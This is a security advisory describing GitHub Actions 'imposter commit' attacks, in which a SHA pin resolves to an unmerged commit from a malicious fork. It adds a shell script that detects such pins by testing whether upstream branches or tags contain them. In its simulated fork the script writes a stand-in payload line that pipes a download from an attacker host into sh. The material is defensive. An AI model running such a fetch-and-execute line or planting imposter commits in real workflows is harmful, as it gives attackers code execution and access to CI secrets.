H3-2025-0008
GitHub Actions Imposter Commit
| Field | Value |
|---|---|
| Category | SECURITY_CONTROLS |
| Base Score | 6.0 |
Description
GitHub Actions workflows that reference an action or repository by a bare commit SHA, with no accompanying tag or branch, may inadvertently fetch a commit that was pushed to a malicious fork rather than one that belongs to the parent repository. GitHub serves every object in a repository's fork network under the parent repository's URL, so a commit that exists only in a fork still resolves when requested from the parent by SHA. Pinning to a full SHA remains the right practice; the weakness is trusting a SHA that has not been verified to be reachable from a branch or tag of the parent repository, because such an "imposter" commit was never reviewed or merged upstream and may be malicious.
Impact
An attacker may exploit this weakness to obtain remote code execution in the context of the GitHub Actions workflow, with access to whatever secrets, tokens and runner resources the affected job exposes.
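The following is an added example, not part of this advisory, showing the check a practitioner would run against a SHA-pinned `uses:` line: an object-existence check accepts the imposter commit, while a reachability check against the upstream's branches and tags rejects it. GitHub's fork-network object sharing is emulated locally by fetching a fork's objects into a clone of the upstream; the repository names, file contents, and the constructed `ci.yml` are assumptions for the demonstration, and `audit_workflow` maps every pin to one local clone for simplicity. Against a real action you would clone or `git fetch` the upstream repository (not the fork) and run the same `for-each-ref --contains` test.

```shell
#!/bin/sh
# Added example: detect an imposter commit pinned by SHA in a workflow.
set -eu

export GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.invalid
export GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.invalid

WORK="$(mktemp -d)"

# Constructed "upstream" action repository with one tagged release.
git init -q "$WORK/upstream"
echo 'echo upstream action' > "$WORK/upstream/action.sh"
git -C "$WORK/upstream" add action.sh
git -C "$WORK/upstream" commit -q -m "release v1.0.0"
git -C "$WORK/upstream" tag v1.0.0
UPSTREAM_SHA="$(git -C "$WORK/upstream" rev-parse HEAD)"

# An attacker forks it and pushes a commit the upstream never merged.
git clone -q "$WORK/upstream" "$WORK/fork"
echo 'curl https://attacker.invalid/x | sh' > "$WORK/fork/action.sh"
git -C "$WORK/fork" commit -q -am "totally legit fix"
IMPOSTER_SHA="$(git -C "$WORK/fork" rev-parse HEAD)"

# The auditor's clone of the upstream. Fetching the fork's HEAD into it
# (objects only; FETCH_HEAD is not a branch or tag) stands in for GitHub's
# shared fork-network object store: the imposter commit is now retrievable
# by SHA even though no upstream ref points at it.
git clone -q "$WORK/upstream" "$WORK/check"
git -C "$WORK/check" fetch -q "$WORK/fork" HEAD

# sha_exists CLONE SHA: the naive check, does the pin resolve to a commit at all?
# This succeeds for imposter commits, which is exactly the problem.
sha_exists() {
  git -C "$1" cat-file -e "$2^{commit}" 2>/dev/null
}

# sha_reachable CLONE SHA: the check that matters, is the commit contained in
# some branch or tag of the upstream remote (origin)?
sha_reachable() {
  [ -n "$(git -C "$1" for-each-ref --contains "$2" refs/remotes/origin refs/tags)" ]
}

# Constructed sample workflow: one pin is the real release commit, the other
# is the imposter commit lifted from the fork. Both resolve under the upstream.
cat > "$WORK/ci.yml" <<EOF
jobs:
  build:
    steps:
      - uses: example/action@$UPSTREAM_SHA
      - uses: example/action@$IMPOSTER_SHA
EOF

# audit_workflow FILE CLONE: report every full-SHA pin in FILE; return 1 if
# any pin is not reachable from the upstream's branches or tags.
audit_workflow() {
  _rc=0
  for sha in $(grep -oE 'uses: *[^@ ]+@[0-9a-f]{40}' "$1" | sed 's/.*@//'); do
    if sha_reachable "$2" "$sha"; then
      echo "ok       $sha"
    else
      echo "IMPOSTER $sha (object exists, but no upstream branch or tag contains it)"
      _rc=1
    fi
  done
  return $_rc
}

audit_workflow "$WORK/ci.yml" "$WORK/check" || echo "workflow pins an imposter commit"
```

The fetch into `$WORK/check` is the only artificial step; on GitHub the attacker's objects are already served under the parent's URL, which is why `sha_exists` (and `actions/checkout` itself) cannot tell the two commits apart. Only the containment test against upstream refs distinguishes them.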